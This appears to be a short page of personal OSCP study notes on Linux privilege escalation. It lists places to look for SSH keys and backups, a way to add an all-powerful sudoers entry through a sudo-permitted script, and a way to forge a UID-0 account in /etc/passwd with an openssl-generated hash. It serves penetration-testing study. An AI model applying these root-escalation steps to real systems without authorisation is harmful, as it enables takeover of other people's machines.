O
O
OSCP Notes
Search…
Linux Priv Esc
do find . -ls -type f
shows only files in the current directory.
Basic Linux Privilege Escalation - g0tmi1k
check /etc/ssh/ssh_config
look in /var/
/opt/
/usr/local/src
/usr/src/
var\backups\ssh\authorized_keys
---
Adding priviledge specification to a file
cat /etc/sudoers
make a tmp file that has the following content:
user ALL=(ALL:ALL) ALL
change the user to any account you want it to have the power.
run a sudo command that lets you do a command execution
sudo test.py /etc/sudoers /tmp/sudoadd
======
If you have the power to write
openssl passwd -crypt -salt Unko(username) Unkosama(password)
Creates a password hash
tail -1 /etc/passwd > new_pass to copy the last password line
edit the user and the password section(paste the hash that you created.
example:
Unko:HASHES:0:0:UNKO:/root:/bin/bash
Copy link